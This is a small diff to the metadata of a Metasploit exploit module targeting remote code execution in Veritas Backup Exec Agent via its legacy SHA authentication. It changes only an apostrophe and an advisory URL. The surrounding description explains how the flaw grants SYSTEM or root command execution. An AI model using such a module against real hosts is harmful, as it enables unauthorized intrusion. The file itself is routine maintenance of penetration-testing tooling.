@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Veritas Backup Exec Agent Remote Code Execution',
         'Description' => %q{
           Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them.
-          This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled.
+          This authentication scheme is no longer used within Backup Exec versions, but hadn't yet been disabled.
           An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to
           the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges
           depending on the platform.
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2021-27876'],
           ['CVE', '2021-27877'],
           ['CVE', '2021-27878'],
-          ['URL', 'https://www.veritas.com/content/support/en_US/security/VTS21-001']
+          ['URL', 'http://web.archive.org/web/20250222002651/https://www.veritas.com/content/support/en_US/security/VTS21-001']
         ],
         'Platform' => %w[win linux],
         'Targets' => [
